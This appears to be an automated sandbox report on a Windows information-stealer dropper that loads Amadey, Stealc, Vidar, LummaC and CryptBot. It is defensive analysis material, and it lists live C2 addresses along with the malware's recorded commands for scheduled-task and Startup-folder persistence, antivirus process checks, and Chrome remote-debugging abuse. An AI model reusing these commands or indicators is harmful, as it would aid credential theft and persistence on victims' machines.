Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1546540
MD5:	08fa512abc42a3d5f8ba6ad72f5c550e
SHA1:	6b38e59bc4dfdebe5396700e918b96fc22a07611
SHA256:	d573c7e78c05a4d3a653269e00635a56516fefa23a8485a29fdecf75ef5b5e18
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Drops large PE files

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SgrmBroker.exe (PID: 6680 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

sppsvc.exe (PID: 4504 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)

svchost.exe (PID: 4040 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6420 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 5060 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6968 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

MpCmdRun.exe (PID: 7192 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

file.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)

axplong.exe (PID: 7468 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)

svchost.exe (PID: 7376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

axplong.exe (PID: 7616 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)

svchost.exe (PID: 8012 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

axplong.exe (PID: 8068 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)

stealc_default2.exe (PID: 4092 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 68A99CF42959DC6406AF26E91D39F523)

Offnewhere.exe (PID: 7260 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" MD5: 87E4E869971CEC9573811040F6140157)

chrome.exe (PID: 4196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

splwow64.exe (PID: 7300 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" MD5: 5D97C2475C8A4D52E140EF4650D1028B)

cmd.exe (PID: 1168 cmdline: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2380 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1888 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 3028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2992 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7504 cmdline: cmd /c md 197036 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7520 cmdline: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7536 cmdline: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Jurisdiction.pif (PID: 7552 cmdline: Jurisdiction.pif T MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 7672 cmdline: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6244 cmdline: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 5948 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7568 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

new_v8.exe (PID: 2864 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" MD5: 5009B1EF6619ECA039925510D4FD51A1)

f55899dae2.exe (PID: 2348 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" MD5: 26D8D52BAC8F4615861F39E118EFA28D)

RegAsm.exe (PID: 6688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 3364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

550b7cfe5f.exe (PID: 5732 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" MD5: 6250E716BE9BB3618C85DA75BB8A8351)

GOLD1234.exe (PID: 5504 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDX123456.exe (PID: 5292 cmdline: "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" MD5: FBA8F56206955304B2A6207D9F5E8032)

svchost.exe (PID: 7700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 6844 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 7836 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 2080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 5380 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: LummaC

{"C2 url": ["computeryrati.site", "faulteyotk.site", "contemteny.site", "authorisev.site", "servicedny.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: Cryptbot

{"C2 list": ["sevjoi17sr.top", "home.sevjoi17sr.top", "0/80/home.sevjoi17sr.top"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4092	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4092	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 4092	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4092	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Offnewhere.exe PID: 7260	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: new_v8.exe PID: 2864	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 2864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 2864	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 550b7cfe5f.exe PID: 5732	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 550b7cfe5f.exe PID: 5732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 53 entries

Unpacked PEs

Source	Rule	Description	Author
17.0.stealc_default2.exe.770000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
17.2.stealc_default2.exe.770000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
13.2.axplong.exe.c50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.axplong.exe.c50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.axplong.exe.c50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.file.exe.a00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8908bf20d.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ProcessId: 6244, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

